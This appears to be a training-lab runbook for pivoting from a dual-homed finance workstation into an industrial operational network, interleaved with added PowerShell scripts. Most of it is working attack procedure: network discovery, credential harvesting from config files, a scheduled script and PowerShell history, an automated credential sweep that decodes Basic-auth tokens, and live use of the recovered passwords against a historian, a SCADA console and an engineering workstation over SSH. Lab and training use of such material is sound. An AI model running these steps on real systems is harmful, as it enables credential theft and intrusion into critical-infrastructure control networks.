Runbook: bursar-desk¶
Identity and domain¶
Establish who you are and what domain you are in before moving on.
PS C:\Users\bursardesk> whoami
PS C:\Users\bursardesk> hostname
PS C:\Users\bursardesk> systeminfo
PS C:\Users\bursardesk> whoami /groups
PS C:\Users\bursardesk> net localgroup Administrators
systeminfo confirms UUPL domain membership and Windows 10 build. whoami /groups shows
domain membership. net localgroup Administrators shows bursardesk has local admin.
Network discovery¶
The dual-homed NIC is the key finding. Establish it early.
PS C:\Users\bursardesk> ipconfig /all
Two adapters: Ethernet 0 at 10.10.1.20 (enterprise) and Ethernet 1 at 10.10.2.100 (operational). Each shows a Physical Address field with the real hardware MAC. The second NIC is the pivot point.
PS C:\Users\bursardesk> route print
The IPv4 table shows an on-link route to 10.10.2.0/24 on interface 10.10.2.100 (gateway column reads On-link). This confirms direct access to the operational network without going through the engineering workstation or any gateway.
PS C:\Users\bursardesk> arp -a
ARP cache bucketed by interface. Entries in the 10.10.2.x range confirm the machine has already talked to operational hosts.
PS C:\Users\bursardesk> netstat
Active connections. Check for established sessions to 10.10.2.10 (historian) or 10.10.2.20 (SCADA).
PS C:\Users\bursardesk> ping 10.10.2.10
PS C:\Users\bursardesk> ping 10.10.2.20
PS C:\Users\bursardesk> ping 10.10.2.30
Historian, SCADA, and engineering workstation are all reachable via the operational NIC.
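The discovery steps above as one script, added here as an example (mine, not part of the runbook): it enumerates IPv4 adapters and flags the multi-homed condition, lists on-link subnets so the 10.10.2.0/24 route stands out without reading route print by eye, and tests the three operational hosts while reporting which local address each reply left from. It assumes the NetTCPIP cmdlets (Get-NetIPAddress, Get-NetRoute, Test-NetConnection), built into Windows 8/Server 2012 and later; the host addresses and names are the runbook's.

```powershell
# Added example, not from the runbook. Assumes the NetTCPIP module
# (Get-NetIPAddress, Get-NetRoute, Test-NetConnection), built into Windows 10.

# Operational hosts named in the runbook.
$opsHosts = [ordered]@{
    '10.10.2.10' = 'historian'
    '10.10.2.20' = 'SCADA'
    '10.10.2.30' = 'engineering workstation'
}

# 1. Usable IPv4 addresses: drop loopback and APIPA (169.254.x) noise.
$addrs = @(Get-NetIPAddress -AddressFamily IPv4 |
    Where-Object { $_.IPAddress -ne '127.0.0.1' -and $_.IPAddress -notlike '169.254.*' } |
    Select-Object InterfaceAlias, InterfaceIndex, IPAddress, PrefixLength)
$addrs | Format-Table -AutoSize
if ($addrs.Count -gt 1) {
    Write-Warning ("Multi-homed host: {0} IPv4 interfaces ({1})" -f $addrs.Count, ($addrs.IPAddress -join ', '))
}

# 2. On-link routes (NextHop 0.0.0.0): subnets this machine reaches without a
#    gateway. Host routes (/32), loopback and multicast are filtered out, so
#    anything left beyond the enterprise segment is a pivot candidate.
Get-NetRoute -AddressFamily IPv4 |
    Where-Object {
        $_.NextHop -eq '0.0.0.0' -and
        $_.DestinationPrefix -notlike '*/32' -and
        $_.DestinationPrefix -notmatch '^(127\.|224\.)'
    } |
    Select-Object DestinationPrefix, InterfaceAlias, InterfaceIndex, RouteMetric |
    Format-Table -AutoSize

# 3. Reachability of the operational hosts, with the source address used.
#    A source on the second NIC proves the traffic did not go out through the
#    enterprise default gateway.
foreach ($ip in $opsHosts.Keys) {
    $r = Test-NetConnection -ComputerName $ip -WarningAction SilentlyContinue
    [pscustomobject]@{
        Host      = $opsHosts[$ip]
        Address   = $ip
        Reachable = $r.PingSucceeded
        Source    = $r.SourceAddress.IPAddress
        Interface = $r.InterfaceAlias
    }
}
```

Run it once before anything else: a second usable IPv4 address and a non-enterprise on-link prefix together are the "not an ordinary corporate machine" signal, and the Source column ties each reachable operational host to the NIC that actually carried the probe.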
File hunting¶
The Windows user profile is the primary loot surface. Start recursive. Note that the dir /s form below is cmd.exe syntax; in a native PowerShell session dir is an alias for Get-ChildItem, which does not accept /s, and the equivalent is Get-ChildItem -Recurse -Filter *.conf (likewise for *.ps1 and *.csv).
PS C:\Users\bursardesk> dir /s *.conf
Returns AppData\Roaming\UUPLOps\ops-access.conf: plaintext credentials for historian and SCADA.
PS C:\Users\bursardesk> dir /s *.ps1
Returns Desktop\pull_monthly_report.ps1: scheduled script with hard-coded historian password.
PS C:\Users\bursardesk> dir /s *.csv
Returns reports\turbine_2024-01.csv through turbine_2024-03.csv: turbine telemetry pulled monthly from the historian. The timestamps and values in these files confirm the script has been pulling from the historian successfully; whether it is still live is settled under Live service verification below.
PS C:\Users\bursardesk> dir Documents\
PS C:\Users\bursardesk> dir Desktop\
PS C:\Users\bursardesk> dir AppData\Roaming\UUPLOps\
PS C:\Users\bursardesk> dir AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\bursardesk> dir reports\
Walk the profile manually after the recursive dump. The UUPLOps and PSReadLine directories are the most productive.
Credential discovery¶
Read the credential files directly¶
PS C:\Users\bursardesk> type AppData\Roaming\UUPLOps\ops-access.conf
historian / Historian2015 and admin / admin (SCADA web console). Written in 2019, never rotated.
PS C:\Users\bursardesk> type Desktop\pull_monthly_report.ps1
Hard-coded $Pass = "Historian2015". The script calls /report on the historian and saves the result to reports\turbine_YYYY-MM.csv. The reports in the profile were generated by exactly this.
Scrape with findstr¶
PS C:\Users\bursardesk> findstr /i pass AppData\Roaming\UUPLOps\ops-access.conf
Returns all lines containing “pass”: the historian and SCADA credential entries.
PS C:\Users\bursardesk> findstr /si pass AppData\Roaming\UUPLOps\ops-access.conf
/si combines case-insensitive matching with a recursive search of subdirectories for files matching the name given, so the file argument acts as a pattern. Against a single file it returns the same lines as /i; the switch pays off when run from the profile root with a wildcard such as *.conf.
Windows Credential Manager¶
PS C:\Users\bursardesk> cmdkey /list
Shows saved credentials by target and user name only; the secret itself is not displayed. Expect an entry for uupl-historian (10.10.2.10), populated when the monthly report script ran interactively.
PowerShell history¶
The equivalent of .bash_history. Almost always revealing.
PS C:\Users\bursardesk> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
The history contains:
Invoke-WebRequest to http://10.10.2.10:8080/report with a Basic auth header encoded as Base64
ssh engineer@10.10.2.30 (engineering workstation session)
nmap -sn 10.10.2.0/24 (the user already scanned the operational segment)
ping 10.10.2.10
The Base64 string in the Invoke-WebRequest line decodes to historian:Historian2015. The same
credential is in ops-access.conf; the history is a second source and shows the credential in use
against the exact endpoint the monthly report script calls.
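The file hunting and credential discovery steps above as a single sweep, added here as an example (mine, not part of the runbook): it recurses the profile for the file types the runbook finds credentials in, returns every line matching the same trigger as findstr /i pass plus anything carrying an Authorization header or a bare Basic token, and decodes the token on the spot, which is the step the history entry needs. PSReadLine history is picked up through the *.txt pattern (-Force is required because AppData is hidden). The pattern list, the file-type list and the function name are my assumptions, not the lab's.

```powershell
# Added example, not from the runbook. Patterns, file types and the function
# name are assumptions; the profile layout it walks is the one the runbook shows.

function Find-ProfileCredentials {
    param(
        [string]$Root = $env:USERPROFILE,
        [string[]]$Include = @('*.conf', '*.ps1', '*.txt', '*.ini', '*.xml', '*.json')
    )

    # 'pass' is the runbook's findstr trigger; the other two catch headers and
    # bare Basic tokens such as the one in ConsoleHost_history.txt.
    $patterns = @(
        'pass',
        'Authorization',
        'Basic\s+[A-Za-z0-9+/]{8,}={0,2}'
    )

    # -Force: AppData\Roaming is a hidden tree and would be skipped otherwise.
    $files = Get-ChildItem -Path $Root -Recurse -Force -File -Include $Include -ErrorAction SilentlyContinue

    foreach ($hit in ($files | Select-String -Pattern $patterns)) {
        $line    = $hit.Line.Trim()
        $decoded = $null
        # Basic auth is Base64 of user:password; one call gets the cleartext back.
        if ($line -match 'Basic\s+([A-Za-z0-9+/]+={0,2})') {
            try {
                $decoded = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Matches[1]))
            } catch {
                $decoded = '<not valid base64>'
            }
        }
        [pscustomobject]@{
            File    = $hit.Path.Substring($Root.Length).TrimStart('\')
            LineNo  = $hit.LineNumber
            Text    = $line
            Decoded = $decoded
        }
    }
}

# Run as the profile owner; -Wrap keeps long Invoke-WebRequest lines readable.
Find-ProfileCredentials | Format-Table -AutoSize -Wrap
```

Expect ops-access.conf, pull_monthly_report.ps1 and ConsoleHost_history.txt to all appear, with the history row carrying the decoded historian credential in the last column. The broad 'pass' trigger also matches harmless words (bypass, PassThru) in scripts; that noise is cheaper than a tighter pattern that misses a non-standard key name.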
Scheduled tasks and processes¶
PS C:\Users\bursardesk> schtasks /query
Returns the MonthlyReport task: the scheduled pull_monthly_report.ps1 run on the 1st of each month.
PS C:\Users\bursardesk> tasklist
Running processes. python.exe present indicates a background script is running; svchost and powershell are expected. Note the PIDs, since tasklist is the only way here to put a name to a connection owner.
PS C:\Users\bursardesk> Get-PSDrive
Drive list. C: is the local profile. No mapped drives pre-configured.
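Two things the plain schtasks, tasklist and netstat output does not give directly, added here as an example (mine, not part of the runbook): the account and logon type the MonthlyReport task runs under, which decides whose token the hard-coded historian credential is used with, and each established connection into 10.10.2.0/24 joined to its owning process. It assumes the ScheduledTasks and NetTCPIP modules (Windows 8/Server 2012 and later); the task name and subnet are the runbook's, the function names are mine.

```powershell
# Added example, not from the runbook. Assumes the ScheduledTasks and NetTCPIP
# modules; task name and subnet are the runbook's, function names are mine.

function Get-TaskSummary {
    param([string]$TaskName = 'MonthlyReport')
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    if (-not $task) { Write-Warning "No task named $TaskName"; return }
    $info = $task | Get-ScheduledTaskInfo
    [pscustomobject]@{
        Task      = $task.TaskName
        State     = $task.State
        # Principal: whose token the script, and therefore the credential, runs under.
        RunAs     = $task.Principal.UserId
        LogonType = $task.Principal.LogonType
        RunLevel  = $task.Principal.RunLevel
        # Action: confirms it is pull_monthly_report.ps1 and with what arguments.
        Command   = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        LastRun   = $info.LastRunTime
        NextRun   = $info.NextRunTime
    }
}

function Get-OperationalConnections {
    param([string]$Prefix = '10.10.2.')
    # Established TCP sessions into the operational segment, with owning process.
    Get-NetTCPConnection -State Established |
        Where-Object { $_.RemoteAddress -like "$Prefix*" } |
        ForEach-Object {
            $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Local   = "$($_.LocalAddress):$($_.LocalPort)"
                Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
                PID     = $_.OwningProcess
                Process = $p.ProcessName
                # Path is empty for processes the current token cannot open.
                Path    = $p.Path
            }
        }
}

Get-TaskSummary | Format-List
Get-OperationalConnections | Format-Table -AutoSize
```

If RunAs is anything other than bursardesk (a service account, or SYSTEM with RunLevel Highest), the credential problem is wider than one user profile. The Local column should show 10.10.2.100 for every operational session, matching the route finding.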
Live service verification¶
Use the credentials found in the profile against real services.
PS C:\Users\bursardesk> iwr -Uri http://10.10.2.10:8080/assets -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Returns the historian tag list: one metric name per line (frequency_hz_x10, line_current_a, turbine_rpm, turbine_temperature, etc.). Confirms the credential works and the historian is reachable directly from the operational NIC. The Base64 string is historian:Historian2015.
PS C:\Users\bursardesk> iwr -Uri "http://10.10.2.10:8080/report?asset=turbine_rpm&from=<YYYY-MM>-01&to=<YYYY-MM>-28" -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Returns CSV with headers (timestamp,value,unit) and data rows. Use the current month for
<YYYY-MM>: the historian seeds 30 days of data back from startup, so recent months have
rows. This is the same query pull_monthly_report.ps1 runs with its default $Month value.
PS C:\Users\bursardesk> iwr -Uri http://10.10.2.20:8080/ -Headers @{Authorization="Basic YWRtaW46YWRtaW4="}
Returns the distribution-SCADA dashboard HTML. Credential is admin / admin (from ops-access.conf). The Base64 string is admin:admin.
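The three verification calls above, built from the recovered credential rather than a pasted token, added here as an example (mine, not part of the runbook): it constructs the Basic header, lists the tags, pulls the current month of turbine_rpm for the same 1st-to-28th window pull_monthly_report.ps1 uses, and parses the CSV so the rows can be counted and ranged instead of eyeballed. Host, port, endpoint paths and the timestamp,value,unit header are the runbook's; the function names and the query handling around them are my assumptions.

```powershell
# Added example, not from the runbook. Hosts, ports, paths and CSV header are
# the runbook's; function names and error handling are assumptions of mine.

function New-BasicAuthHeader {
    param([string]$User, [string]$Password)
    # Base64 is an encoding, not a secret: the token decodes straight back.
    $token = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("${User}:${Password}"))
    @{ Authorization = "Basic $token" }
}

function Get-HistorianAssets {
    param([hashtable]$Headers, [string]$BaseUri = 'http://10.10.2.10:8080')
    # /assets returns one tag name per line.
    $r = Invoke-WebRequest -Uri "$BaseUri/assets" -Headers $Headers -UseBasicParsing
    ($r.Content -split "`r?`n") | ForEach-Object { $_.Trim() } | Where-Object { $_ }
}

function Get-HistorianReport {
    param(
        [string]$Asset,
        [datetime]$From,
        [datetime]$To,
        [hashtable]$Headers,
        [string]$BaseUri = 'http://10.10.2.10:8080'
    )
    # Built as one string and passed as a value: an unquoted & is a PowerShell operator.
    $uri = '{0}/report?asset={1}&from={2:yyyy-MM-dd}&to={3:yyyy-MM-dd}' -f
           $BaseUri, [uri]::EscapeDataString($Asset), $From, $To
    try {
        $r = Invoke-WebRequest -Uri $uri -Headers $Headers -UseBasicParsing
    } catch {
        # Windows PowerShell throws on any non-2xx; a 401 here means the credential is wrong or rotated.
        throw "historian query failed: $($_.Exception.Message)"
    }
    # timestamp,value,unit rows become objects with those three properties.
    ($r.Content -split "`r?`n") | Where-Object { $_ } | ConvertFrom-Csv
}

$hdr = New-BasicAuthHeader -User 'historian' -Password 'Historian2015'
$hdr.Authorization

Get-HistorianAssets -Headers $hdr

# Current month, 1st to 28th, as pull_monthly_report.ps1 does by default.
$first = (Get-Date -Day 1).Date
$rows  = Get-HistorianReport -Asset 'turbine_rpm' -From $first -To $first.AddDays(27) -Headers $hdr
$rows | Select-Object -First 5
$rows | ForEach-Object { [double]$_.value } | Measure-Object -Minimum -Maximum -Average

# SCADA console with the second pair from ops-access.conf.
$scada = Invoke-WebRequest -Uri 'http://10.10.2.20:8080/' -Headers (New-BasicAuthHeader -User 'admin' -Password 'admin') -UseBasicParsing
"SCADA dashboard: HTTP $($scada.StatusCode), $($scada.Content.Length) bytes"
```

The header the first call prints is the same token the runbook pastes, which is the point: the Base64 in the history and in the runbook is the password, not a protection for it. Measure-Object on the parsed rows gives a quick sanity check that the month returned real telemetry rather than an empty header.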
Known hosts¶
PS C:\Users\bursardesk> type .ssh\known_hosts
Host keys for 10.10.2.10 (historian), 10.10.2.20 (SCADA), and 10.10.2.30 (engineering workstation). These confirm which hosts bursardesk has connected to before. SSH to any of them will not prompt for host key verification.
Pivot options¶
With a shell on 10.10.2.100, the operational network is directly reachable without touching the engineering workstation or the enterprise-to-operational firewall.
PS C:\Users\bursardesk> ssh engineer@10.10.2.30
Password: spanner99 (from hex-legacy-1 ENGINEER.LOG). The known_hosts entry confirms this connection has been made before.
PS C:\Users\bursardesk> iwr -Uri "http://10.10.2.10:8080/report?asset=turbine_rpm&from=<YYYY-MM>-01&to=<YYYY-MM>-28" -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Historian data without relaying through any other machine. URL quoted because an unquoted & is a PowerShell operator, not argument text, and the parser rejects the line.
SCADA at 10.10.2.20 and engineering workstation at 10.10.2.30 are both one hop from 10.10.2.100.
What makes this realistic¶
A corporate workstation that accumulated operational access through individually reasonable decisions. The finance department needed monthly turbine reports. Credentials were hard-coded because that was quicker. The script ran automatically; nobody revoked the access when the temporary arrangement became permanent.
The dual-homed NIC is the architectural tell. route print on a finance workstation showing a
10.10.2.0/24 route is the moment a participant confirms this is not an ordinary corporate machine.
No execution policy blocks. No UAC prompts. The credentials are in plaintext files in the user profile, as they have been since 2019.
Quick reference¶
whoami /groups domain membership
ipconfig /all both NICs: 10.10.1.20 + 10.10.2.100
route print confirm 10.10.2.0 route (key finding)
arp -a recent operational contacts
dir /s *.conf find ops-access.conf
dir /s *.ps1 find pull_monthly_report.ps1
type AppData\Roaming\UUPLOps\ops-access.conf historian + SCADA credentials
type Desktop\pull_monthly_report.ps1 hard-coded historian password
type ...\PSReadLine\ConsoleHost_history.txt command history (Base64 creds visible)
findstr /i pass AppData\Roaming\UUPLOps\ops-access.conf credential scrape
cmdkey /list saved Windows credentials
schtasks /query monthly report task
ping 10.10.2.10 historian reachable via operational NIC
iwr -Uri http://10.10.2.10:8080/assets -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="} live historian query
iwr -Uri http://10.10.2.20:8080/ -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} distribution-SCADA dashboard (admin:admin)
ssh engineer@10.10.2.30 pivot to engineering workstation (spanner99)